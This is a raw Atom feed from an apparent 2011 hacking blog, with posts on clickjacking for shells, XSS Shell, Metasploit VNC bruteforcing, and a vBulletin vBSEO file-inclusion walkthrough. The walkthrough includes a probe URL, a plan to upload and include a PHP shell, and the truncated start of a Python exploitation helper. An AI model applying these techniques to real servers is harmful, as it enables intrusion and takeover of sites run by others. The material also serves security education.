&lt;embed src=&quot;http://www.youtube.com/v/x4BrnSsrMg8?version=3&quot; type=&quot;application/x-shockwave-flash&quot; allowfullscreen=&quot;true&quot; allowScriptAccess=&quot;always&quot; width=&quot;520&quot; height=&quot;360&quot;&gt;&lt;/object&gt;
&lt;br /&gt;
Andrew Horton (urbanadventurer) presented Clickjacking for Shells at the
 OWASP Wellington, New Zealand Chapter Meeting on September 20th, 2011.&lt;br /&gt;&lt;br /&gt;Two
 years after the world was warned about clickjacking, popular web apps 
are still vulnerable and no web app exploits have been published. With 
many security pros considering clickjacking to have mere nuisance value 
on social networks, the attack is grossly underestimated. I will 
demonstrate step by step how to identify vulnerable applications, how to
 write exploits that attack web apps and also how to protect against 
clickjacking. To demonstrate this issue I will publish an 0day 
clickjacking exploit for WordPress v3.1.2 and earlier to gain a shell on
 the webserver. In May this year the tech media reported and speculated 
upon clickjacking protection being implemented in WordPress and now I 
will show you why it is so important.&lt;br /&gt;
# ITS ©
# 2009 - 2011</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/2304110249187973637/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2011/10/clickjacking-for-shells.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/2304110249187973637'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/2304110249187973637'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2011/10/clickjacking-for-shells.html' title='Clickjacking for Shells'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-8751083656934354885</id><published>2011-02-16T01:56:00.000-08:00</published><updated>2011-02-16T01:56:40.754-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><title type='text'>Webdav IIS6 bypass and code execution</title><content type='html'>&lt;iframe frameborder=&quot;0&quot; height=&quot;300&quot; src=&quot;http://player.vimeo.com/video/4750408?color=ff9933&quot; width=&quot;400&quot;&gt;&lt;/iframe&gt;&lt;br /&gt;
# ITS © &lt;br /&gt;
# 2009 - 2011</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/8751083656934354885/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2011/02/webdav-iis6-bypass-and-code-execution.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/8751083656934354885'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/8751083656934354885'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2011/02/webdav-iis6-bypass-and-code-execution.html' title='Webdav IIS6 bypass and code execution'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-4107277161765422003</id><published>2011-02-08T02:41:00.000-08:00</published><updated>2011-02-08T02:41:28.557-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><title type='text'>XSS Shell Zombie Manager</title><content type='html'>&lt;iframe allowfullscreen=&#39;allowfullscreen&#39; webkitallowfullscreen=&#39;webkitallowfullscreen&#39; mozallowfullscreen=&#39;mozallowfullscreen&#39; width=&#39;320&#39; height=&#39;266&#39; src=&#39;https://www.youtube.com/embed/vgrxDZVApdI?feature=player_embedded&#39; frameborder=&#39;0&#39;&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt; &lt;span style=&quot;font-size: x-small;&quot;&gt;XSS Shell is powerful a XSS backdoor and zombie manager. This concept first presented by &quot;XSS-Proxy - http://xss-proxy.sourceforge.net/&quot;. Normally in XSS attacks attacker has one shot, in XSS Shell you can interactively send requests and get responses from victim. you can backdoor the page. &lt;br /&gt;
&lt;br /&gt;
You can steal basic auth, you can bypass IP restrictions in administration panels, you can DDoS some systems with a permanent XSS vulnerability etc. Attack possibilities are limited with ideas. Basically this tool demonstrates that you can do more with XSS.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;# ITS ©&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;# 2009 - 2011&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/4107277161765422003/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2011/02/xss-shell-zombie-manager.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/4107277161765422003'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/4107277161765422003'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2011/02/xss-shell-zombie-manager.html' title='XSS Shell Zombie Manager'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-870646502596868300</id><published>2011-01-11T10:34:00.000-08:00</published><updated>2011-01-11T10:34:36.971-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="metasploit"/><title type='text'>Metasploit and VNC Password Bruteforcing</title><content type='html'>&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif; font-size: x-small;&quot;&gt;You probably missed it but jduck recently snuck in a VNC mixin and vnc_login module to the trunk.&lt;br /&gt;
This is awesome because before that I had to use Immunity&#39;s&amp;nbsp;&lt;a href=&quot;http://www.immunitysec.com/resources-freesoftware.shtml&quot;&gt;VAAseline&lt;/a&gt;&amp;nbsp;to do VNC bruteforcing. But now you can just use vnc_login.&lt;br /&gt;
So the scenario is you find yourself on the other end of a VNC server.&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK7sEHN1fK4C-vXfK6oTaWQN1ZW4U1xciSDyAIJotMCWdjKuEbLcTTsYXqB1EX1w152btSIJD1K3A3SUTUUYnvpG87UqzTA15FzTRtcpXMDp_X1KuWtBiBikKjV2EI7H8T4QCz2XOsbHU/s1600/vnc-login1.png&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5551751168698607938&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK7sEHN1fK4C-vXfK6oTaWQN1ZW4U1xciSDyAIJotMCWdjKuEbLcTTsYXqB1EX1w152btSIJD1K3A3SUTUUYnvpG87UqzTA15FzTRtcpXMDp_X1KuWtBiBikKjV2EI7H8T4QCz2XOsbHU/s400/vnc-login1.png&quot; style=&quot;border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; cursor: pointer; display: block; height: 271px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 400px;&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
Its tedious to password guess like this&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKAEhdjGkFC2-CQIbKxy5taeCZW9B9kM6vmIwg2ex_eUYRdf8wM7qKGpSgtHYz4jTYjkcCWPUMN1Dh3fPmfBakhReXMgpQzSYJ8wKhUqGtvn_ciZ7jZG3GbOy5VXwfajl8P6AFE6lc5hY/s1600/vnc-login2.png&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5551751326054559986&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKAEhdjGkFC2-CQIbKxy5taeCZW9B9kM6vmIwg2ex_eUYRdf8wM7qKGpSgtHYz4jTYjkcCWPUMN1Dh3fPmfBakhReXMgpQzSYJ8wKhUqGtvn_ciZ7jZG3GbOy5VXwfajl8P6AFE6lc5hY/s400/vnc-login2.png&quot; style=&quot;border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; cursor: pointer; display: block; height: 173px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 175px;&quot; /&gt;&lt;/a&gt;Instead let&#39;s use the metasploit module&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisT-_FNANI3V71c2jsvKDClcKQkukZfEAoK5sPcW7aaCYBrrSSxJaX2yUQ3H2wa_YscW6-TM2e_OLTG5b43Vt8c3NEBhbBwjZviBewNOauyRaGMNUDGSMQw4PkHodGoXVOp2iXCoua9p8/s1600/vnc-login3.png&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5551751662400809090&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisT-_FNANI3V71c2jsvKDClcKQkukZfEAoK5sPcW7aaCYBrrSSxJaX2yUQ3H2wa_YscW6-TM2e_OLTG5b43Vt8c3NEBhbBwjZviBewNOauyRaGMNUDGSMQw4PkHodGoXVOp2iXCoua9p8/s400/vnc-login3.png&quot; style=&quot;border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; cursor: pointer; display: block; height: 80px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 400px;&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
and throw a dictionary attack against the VNC server&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyJhDBjMoEGlqoIz1drxHn3d-my2lUhJ_Bb7QohGH1lcQ100F3g4NLErb5BexivLnX-4M-jBwSOgZjHNWQjaIfQtINkzrEyylAJdcQsZfRuMEnt7ykesb0EWIGekNFJsd_OH_vMoBlYq0/s1600/vnc-login4.png&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5551751861231360786&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyJhDBjMoEGlqoIz1drxHn3d-my2lUhJ_Bb7QohGH1lcQ100F3g4NLErb5BexivLnX-4M-jBwSOgZjHNWQjaIfQtINkzrEyylAJdcQsZfRuMEnt7ykesb0EWIGekNFJsd_OH_vMoBlYq0/s400/vnc-login4.png&quot; style=&quot;border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; cursor: pointer; display: block; height: 266px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 400px;&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
Looks like the VNC no auth module had been ported and stuck in there too :-)&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwVmxrmS4G3tlh8xCbUST5mEeSxhrgOAvEFXCdKKJfHaTv6YQIqsNc_xbkKktZA3jz1Xlbbg08bAdizaMKzdiR890-b9TLtkYvXkxMt3ugUNTnmAmos2X5i3PGiwwF0sFEu91EpTlDg1g/s1600/vnc-login5.png&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5551752816232576690&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwVmxrmS4G3tlh8xCbUST5mEeSxhrgOAvEFXCdKKJfHaTv6YQIqsNc_xbkKktZA3jz1Xlbbg08bAdizaMKzdiR890-b9TLtkYvXkxMt3ugUNTnmAmos2X5i3PGiwwF0sFEu91EpTlDg1g/s400/vnc-login5.png&quot; style=&quot;border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; cursor: pointer; display: block; height: 251px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 400px;&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif; font-size: x-small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif; font-size: x-small;&quot;&gt;# ITS ©&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif; font-size: x-small;&quot;&gt;# 2009 - 2011&lt;/span&gt;</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/870646502596868300/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2011/01/metasploit-and-vnc-password.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/870646502596868300'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/870646502596868300'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2011/01/metasploit-and-vnc-password.html' title='Metasploit and VNC Password Bruteforcing'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK7sEHN1fK4C-vXfK6oTaWQN1ZW4U1xciSDyAIJotMCWdjKuEbLcTTsYXqB1EX1w152btSIJD1K3A3SUTUUYnvpG87UqzTA15FzTRtcpXMDp_X1KuWtBiBikKjV2EI7H8T4QCz2XOsbHU/s72-c/vnc-login1.png" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-2857478616098318309</id><published>2010-08-16T11:22:00.000-07:00</published><updated>2010-08-16T11:49:03.908-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Exploits"/><title type='text'>vBulletin – Not So Secure Anymore</title><content type='html'>&lt;div class=&quot;entry&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Some time ago, an &lt;a href=&quot;http://www.exploit-db.com/exploits/11526/&quot; target=&quot;_blank&quot; title=&quot;vBSEO_LFI&quot;&gt;LFI vulnerability within vBSEO&lt;/a&gt;  was discovered, which allowed an attacker to include locally hosted  files. The challenge, when confronted with an LFI vulnerability, is to  leverage it into executing arbitrary code of our choosing.&lt;/div&gt;&lt;span id=&quot;more-1013&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;Many vBulletin installations are using  this addon to improve their SEO drastically, however many of them are  not fully patched which is good for us, but very bad for those that host  a vulnerable web application.&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://www.exploit-db.com/images/vbseo/vbulletin-1.png&quot;&gt;&lt;img alt=&quot;vBulletin Main Page&quot; class=&quot;aligncenter&quot; height=&quot;362&quot; src=&quot;http://www.exploit-db.com/images/vbseo/vbulletin-1.png&quot; title=&quot;vBulletin Main Page&quot; width=&quot;545&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
In many cases,  it is not piece of cake to exploit LFI, aka Local File Inclusion,  vulnerabilities due to the fact it may not be easy to upload content to  the target server. In some scenarios, it is possible to inject PHP code  into access logs and in others, it is possible to include binary MySQL  files. It should be noted though, that it is usually impossible to  always know where these files are stored.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Of course, we can guess where these  files are stored, but we may still not be sure how the server is  configured and if this approach will work.&lt;/div&gt;&lt;h2&gt;Reconnaissance&lt;/h2&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;First, we need to determine whether our  target is vulnerable or not. This can be done by requesting to include a  local script in the following manner:&lt;/div&gt;&lt;br /&gt;
&lt;div class=&quot;codecolorer-container bash twitlight&quot; style=&quot;overflow: auto; white-space: nowrap;&quot;&gt;&lt;div class=&quot;bash codecolorer&quot;&gt;http:&lt;span class=&quot;sy0&quot;&gt;//&lt;/span&gt;our-target.tld&lt;span class=&quot;sy0&quot;&gt;/&lt;/span&gt;vbseo.php?&lt;span class=&quot;re2&quot;&gt;vbseoembedd&lt;/span&gt;=&lt;span class=&quot;nu0&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;sy0&quot;&gt;&amp;amp;&lt;/span&gt;amp;&lt;span class=&quot;re2&quot;&gt;vbseourl&lt;/span&gt;=.&lt;span class=&quot;sy0&quot;&gt;/&lt;/span&gt;clientscript&lt;span class=&quot;sy0&quot;&gt;/&lt;/span&gt;ieprompt.html&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://www.exploit-db.com/images/vbseo/vbseo-lfi.png&quot;&gt;&lt;img alt=&quot;vBSEO_LFI&quot; class=&quot;aligncenter&quot; height=&quot;362&quot; src=&quot;http://www.exploit-db.com/images/vbseo/vbseo-lfi.png&quot; title=&quot;vBSEO_LFI&quot; width=&quot;545&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
Please note that some installations may appear to be vulnerable even though they’re not.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;From our basic check above, we would  like to test whether our target really is vulnerable to Local File  Inclusions. We do this by creating a small txt file with ‘phpinfo()’ in  it which we will upload to our target via the attachment manager. Some  vBulletin installations store attachments locally, which can be abused  in this case to include a shell or similar malicious code IF we know the  physical location of our file and if there’s a vulnerability which  allows us to do that.&lt;/div&gt;&lt;br /&gt;
&lt;h2&gt;Exploitation&lt;/h2&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;In order to find the physical location  of our uploaded file we need to find the attachment directory and scan  through the subdirectories. I’ve created a small tool for this task,  which is far from complete but it does work on some hosts. You can get  the basic version is as follows:&lt;/div&gt;&lt;br /&gt;
&lt;div class=&quot;codecolorer-container python twitlight&quot; style=&quot;height: 300px; overflow: auto; white-space: nowrap;&quot;&gt;&lt;div class=&quot;python codecolorer&quot;&gt;&lt;span class=&quot;co1&quot;&gt;#!/usr/bin/python&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp;______ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;__ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;__ &amp;nbsp;__ &amp;nbsp; &amp;nbsp; __ &amp;nbsp; ______&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# /\__ &amp;nbsp;_\ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;/\ \__ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;/\ \/\ \ &amp;nbsp;/&#39;__`\/\__ &amp;nbsp;_\&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# \/_/\ \/ &amp;nbsp; &amp;nbsp; ___\ \ ,_\ &amp;nbsp; &amp;nbsp;__ &amp;nbsp; _ __\ \ `\\ \/\ \/\ \/_/\ \/&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp;\ \ \ &amp;nbsp; /&#39; _ `\ \ \/ &amp;nbsp;/&#39;__`\/\`&#39;__\ \ , ` \ \ \ \ \ \ \ \&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; \_\ \__/\ \/\ \ \ \_/\ &amp;nbsp;__/\ \ \/ \ \ \`\ \ \ \_\ \ \ \ \&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; /\_____\ \_\ \_\ \__\ \____\\ \_\ &amp;nbsp;\ \_\ \_\ \____/ &amp;nbsp;\ \_\&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; \/_____/\/_/\/_/\/__/\/____/ \/_/ &amp;nbsp; \/_/\/_/\/___/ &amp;nbsp; &amp;nbsp;\/_/&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp;--------------------------------------------------------&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; Title:&amp;nbsp; vBSEO LFI Assistant Tool&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Author:&amp;nbsp; MaXe&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Site: &amp;nbsp;http://www.intern0t.net&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;#&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; Description: &amp;nbsp;1) Checks whether the vBSEO installation&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; is patched or not. 2) Attempts to find&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; the physical location of an uploaded&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; attachment phile. (PHP Shell)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;#&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Version:&amp;nbsp; 2.1.4 - Reversed Algorithm - Basic Version&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;#&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; License:&amp;nbsp; -- Attribution-ShareAlike 3.0 Unported --&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; http://creativecommons.org/licenses/by-sa/3.0/&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;#&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; Notes:&amp;nbsp; The basic version does not contain multi-&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; threading nor is it able to search through&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; multiple sub directories which the advanced&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; version will be able to.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Please note, that this tool does not work on&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; all types of hosts and you should therefore&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; modify this script to your own needs.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;#&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp;Disclaimer:&amp;nbsp; This tool is meant for ethical purposes only.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# Import the appropriate libraries.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;kw3&quot;&gt;os&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;kw3&quot;&gt;re&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;kw3&quot;&gt;httplib&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;kw3&quot;&gt;sys&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# Clear the screen in a sufficient way.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kw3&quot;&gt;os&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt; == &lt;span class=&quot;st0&quot;&gt;&quot;posix&quot;&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;os&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;system&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;clear&quot;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;elif&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kw3&quot;&gt;os&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt; == &lt;span class=&quot;st0&quot;&gt;&quot;nt&quot;&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;os&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;system&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;cls&quot;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;else&lt;/span&gt;:&lt;br /&gt;
